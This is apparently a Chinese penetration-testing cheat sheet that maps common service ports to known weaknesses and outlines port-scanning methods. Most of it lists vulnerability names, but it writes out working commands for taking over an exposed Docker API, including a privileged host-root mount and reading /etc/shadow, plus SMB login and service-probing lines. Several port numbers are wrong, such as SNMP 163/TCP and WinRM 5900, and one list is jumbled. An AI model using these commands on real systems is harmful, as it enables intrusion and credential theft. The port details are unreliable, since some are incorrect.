常见端口以及脆弱点

常见端口以及脆弱点

FTP(21/tcp)

  1. 弱口令
  2. 默认用户 anonymous:anonymous
  3. VSFTP某版本后门

SSH(22/TCP)

  1. 部分版本SSH存在漏洞可枚举用户名
  2. 弱口令
  3. 28退格漏洞
  4. OpenSSL漏洞
  5. 用户名枚举

telnet(23/TCP)

  1. 暴力破解密码
  2. 嗅探抓取明文密码

SMTP(25/TCP)

  1. 弱口令
  2. 未经授权访问
  3. 邮件伪造

DNS(53/UDP)

  1. 域传送漏洞

  2. DNS劫持

  3. DNS缓存投毒

  4. DNS欺骗

  5. SPF / DMARC Check

  6. DDoS

    1. DNS Query Flood
    2. DNS 反弹
  7. DNS 隧道

DHCP(67/68/546/547TCP)

ps (546/7是IPV6协议的)

  1. DHCP劫持
  2. DHCP欺骗

TFTP(69)

WEB服务(80-89,443,8440-8450,8080-8089/TCP)

IIS(80/443/tcp)

  1. IIS PUT写文件
  2. IIS短文件名泄露
  3. IIS解析漏洞

Apache(80/443/tcp)

  1. Apache Manager后台弱口令
  2. Apache解析漏洞
  3. Apache慢速攻击(slow attack)
  4. CVE-2019-0211:Apache HTTP Server 组件提权

Kerberos (88/TCP)

  1. 主要用于监听KDC的票据请求
  2. 用于进行黄金票据和白银票据的伪造

POP3(110/995/TCP)

  1. 弱口令
  2. 未经授权访问

NFS(111/2049/TCP)

  1. 权限配置不当(rpcinfo信息泄露)
showmount 

RPC(135/TCP)

  1. wmic 服务利用

SMB(137/139/445/TCP)

  1. 爆破
  2. 远程执行类漏洞(ms17-010、ms08-06)
  3. 未授权
  4. 弱口令
net use \\192.168.1.1 /user:xxx\username password

NetBIOS(137/138/UDP)

  1. 未授权访问
  2. 弱口令

IMAP(143/993)

  1. 弱口令
  2. 任意文件读取

SNMP(163/TCP)

  1. Public 弱口令

LDAP(389)

  1. ldap注入
  2. 匿名访问
  3. 弱口令
  4. 用于域上的权限验证服务

OPENSSL(443/8443/TCP)

  1. 心脏滴血

kpasswd(464)

  1. Kerberos 口令和钥匙改换服务

Linux rexec (512/513/514)

  1. rlogin登陆
  2. 直接登录:Metasploitable2使用指南

RTSP(873/TCP)

rsync(873/tcp)

  1. 未授权访问
  2. 本地权限提升

rpc(1025/tcp)

  1. NFS匿名访问

Java RMI(1090/1099/TCP)

  1. 反序列化远程命令执行漏洞

OpenVPN(1352)

Lotus(1352)

  1. 弱口令
  2. 跨站脚本攻击
  3. 信息泄露

SQL Server(1433/TCP)

  1. 弱密码
  2. 差异备份 GetShell
  3. SA 提权

ISPmanager(1500)

  1. 弱口令

Oracle(1521/TCP)

  1. 弱密码

PPTP(1723)

  1. 爆破

cPanel(2082/2083)

  1. 弱口令

ZooKeeper(2181/2171/2375/TCP)

  1. 未授权访问

docker remote API(2375/2376/TCP)

  1. 入侵容器
  2. RCE获取物理机ROOT
1.入侵容器
curl -s http://192.168.1.7:2376/version | python -m json.tool
docker -H 47.244.125.242:2375 ps
docker -H 47.244.125.242:2375 exec -it "mysql"  /bin/bash //执行容器bash

2.RCE获取物理机ROOT
docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine
以下是解释:
Easy RCE using Docker API on port 2375/tcp
docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access: cat /mnt/etc/shadow
RCE: chroot /mnt
来源推特:https://twitter.com/ptswarm/status/1338477426276511749
  1. Zebra(2601/2604/TCP)
  2. 默认密码zerbra
  3. Squid (3128)
  4. 弱口令
  5. MySQL(3306/TCP)
  6. 弱密码
  7. 日志写WebShell
  8. UDF提权
  9. MOF提权

kangle(3311/3312/TCP)

  1. 弱口令

RDP / Terminal Services(3389/TCP)

  1. 弱口令
  2. 远程命令执行( ms12-020、cve-2019-0708)

SVN(3690)

  1. svn泄露
  2. 未授权访问

GlassFish(4848/3700)

  1. 弱口令
  2. 任意文件读取
  3. 认证绕过

DB2(5000/TCP)

  1. 安全限制绕过进行未经授权操作-cve-2015-1922

Sybase(5000/4100/TCP)

  1. 弱口令
  2. 命令注入

postgresql(5432/tcp)

  1. 弱密码
  2. 执行系统命令

Pcanywhere(5632)

  1. 拒绝服务攻击
  2. 权限提升
  3. 代码执行

VNC(5900/5901/5902/TCP)

  1. 弱口令
  2. 认证口令绕过
  3. 拒绝服务攻击-CVE-2015-5239
  4. 权限提升-CVE-2013-6886

couchdb(5984/TCP)

  1. 弱密码
  2. 未授权

WinRM(5900/TCP)

  1. 弱密码

X11(6000)

  1. 未经授权访问-CVE-1999-0526

REDIS(6379/TCP)

  1. 未授权或弱密码

  2. 绝对路径写 WebShell

  3. linux

    1. 计划任务反弹 Shell
    2. 写 SSH 公钥
    3. 主从复制 RCE
  4. windows

    1. Windows 写启动项

Kubernetes API Server(6443/10250/TCP)

https://Kubernetes:10250/pods

weblogic(7001/TCP)

  1. 后台弱口令
  2. console后台部署war包
  3. JAVA反序列化
  4. 远程代码执行
  5. weblogic ssrf
  6. WebLogic 泄漏源代码与目录遍历

Kloxo(7778)

  1. 主机面板登录

JDWP(8000/TCP)

  1. 远程命令执行

Ajenti(8000)

  1. Ajenti(Linux 服务器管理 弱口令 面板)

AJP(8009/tcp)

  1. CVE-2020-1938 任意文件包含/读取漏洞

ActiveMQ(8061/8161/TCP)

  1. 后台弱密码漏洞
  2. 远程代码执行

Jetty(8080/tcp)

  1. 远程共享缓冲区溢出
  2. 敏感信息泄漏:CVE-2018-12536

Resin(8080)

  1. Resin 目录遍历
  2. Resin 远程文件读取

Jenkin/(8080/8089/TCP)

  1. 未授权访问
  2. 反序列化(JBOSS)
  3. 弱口令
  4. 远程代码执行
  5. 任意文件读取

JBOSS(1098/1099/4444/4445/8009/8080/8083/8093/TCP)

  1. 未授权访问
  2. 反序列化(JBOSS)
  3. 弱口令(可后台部署war包getshell)
  4. 远程代码执行

Confluence(8080/tcp)

  1. CVE-2019-3398(Confluence远程代码执行)

Plesk(8443)

  1. 弱口令

Zabbix(8069)

  1. 远程命令执行
  2. SQL注入

solr(8983)

  1. 远程命令执行
  2. CVE-2017-12629
  3. CVE-2019-0193

WebSphere(9080-9081/9090)

  1. Java反序列化
  2. 弱口令
  3. WebSpere任意文件泄漏:CVE-2014-0823

elasticsearch(9200/9300/TCP)

  1. 代码执行
  2. 未授权访问
  3. 任意文件读取
http://es.addr:9200/_plugin/head/
http://es.addr:9200/_nodes

memcache(11211/TCP)

  1. 未授权访问

RabbitMQ(15672/1569/25672/TCP)

MongoDB(27017/27018/TCP)

  1. 未授权访问
  2. 弱密码

Hadoop(50070/50030/50075)

  1. 未授权访问

ActiveMQ消息队列端口(61616)

  1. ActiveMQ反序列化漏洞(CVE-2015-5254)

除了以上列出的可能出现的问题,暴露在公网上的服务若不是最新版,都可能存在已经公开的漏洞

常见端口扫描技术

全扫描

扫描主机尝试使用三次握手与目标主机的某个端口建立正规的连接,若成功建立连接,则端口处于开放状态,反之处于关闭状态。

全扫描实现简单,且以较低的权限就可以进行该操作。但是在流量日志中会有大量明显的记录。

半扫描

在半扫描中,仅发送SYN数据段,如果应答为RST,则端口处于关闭状态,若应答为SYN/ACK,则端口处于监听状态。不过这种方式需要较高的权限,而且部分防火墙已经开始对这种扫描方式做处理。

FIN扫描

FIN扫描是向目标发送一个FIN数据包,如果是开放的端口,会返回RST数据包,关闭的端口则不会返回数据包,可以通过这种方式来判断端口是否打开。

这种方式并不在TCP三次握手的状态中,所以不会被记录,相对SYN扫描要更隐蔽一些。

Web服务

  • Jenkins

    • 未授权访问
  • Gitlab

    • 对应版本CVE
  • Zabbix

    • 权限设置不当

批量搜索

  • Censys
  • Shodan
  • FOFA
  • ZoomEye

other

参考文章:readthedocs

你可能感兴趣的:(渗透测试,安全,信息安全,渗透测试,端口扫描)